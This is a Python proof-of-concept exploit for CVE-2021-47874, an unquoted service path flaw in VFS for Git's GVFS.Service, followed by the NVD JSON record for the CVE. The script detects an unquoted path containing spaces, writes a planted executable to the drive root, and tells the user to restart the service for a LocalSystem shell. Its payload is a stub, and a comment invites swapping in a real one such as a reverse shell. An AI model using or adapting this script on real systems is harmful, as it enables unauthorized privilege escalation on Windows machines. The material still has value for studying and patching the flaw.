CVE-2021-47874

# CVE-2021-47874 PoC - Unquoted Service Path Exploitation # Target: VFS for Git GVFS.Service # Privilege Escalation from Low Privileges to LocalSystem import os import sys import subprocess import shutil def check_service_path(): """Check if GVFS.Service has unquoted path vulnerability""" try: result = subprocess.run( ['sc', 'qc', 'GVFS.Service'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: path_line = [l for l in result.stdout.split('\n') if 'BINARY_PATH_NAME' in l] if path_line: path = path_line[0].split(':', 1)[1].strip() print(f"[+] Service path: {path}") if '"' not in path and ' ' in path: print("[!] VULNERABLE: Path is unquoted with spaces!") return path return None except Exception as e: print(f"[-] Error checking service: {e}") return None def exploit_unquoted_path(service_path): """Exploit unquoted service path by placing malicious executable""" # Extract path components before first space path_parts = service_path.split() if len(path_parts) > 1: first_dir = os.path.dirname(path_parts[0]) # Get the first word of the path (likely the directory name) first_word = os.path.basename(first_dir).split()[0] if ' ' in first_dir else os.path.basename(first_dir) # Create malicious executable in root or parent directory target_dir = service_path[0] + '\\' # Usually C:\ malicious_exe = os.path.join(target_dir, f"{first_word}.exe") if os.path.exists(target_dir) and os.access(target_dir, os.W_OK): print(f"[+] Creating malicious executable at: {malicious_exe}") # Create a simple malicious executable (reverse shell, etc.) create_malicious_exe(malicious_exe) print("[+] Malicious executable created. Waiting for service restart...") print("[+] Trigger service restart: sc stop GVFS.Service && sc start GVFS.Service") return True return False def create_malicious_exe(path): """Create a malicious executable that will be executed as LocalSystem""" # This is a placeholder - replace with actual malicious payload malicious_code = b'MZ' + b'\x00' * 100 # Minimal PE header with open(path, 'wb') as f: f.write(malicious_code) print(f"[+] Malicious executable written to {path}") def main(): print("=" * 60) print("CVE-2021-47874 - VFS for Git Unquoted Service Path PoC") print("=" * 60) # Step 1: Check if vulnerable path = check_service_path() if not path: print("[-] GVFS.Service not found or not vulnerable") return # Step 2: Exploit if exploit_unquoted_path(path): print("[+] Exploitation successful - await LocalSystem shell") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47874", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:20.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VFS for Git 1.0.21014.1 contains an unquoted service path vulnerability in the GVFS.Service Windows service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem privileges during service startup or system reboot."}, {"lang": "es", "value": "VFS para Git 1.0.21014.1 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows GVFS.Service que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con privilegios de LocalSystem durante el inicio del servicio o el reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://vfsforgit.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49661", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vfs-for-git-gvfsservice-unquoted-service-path", "source": "[email protected]"}]}}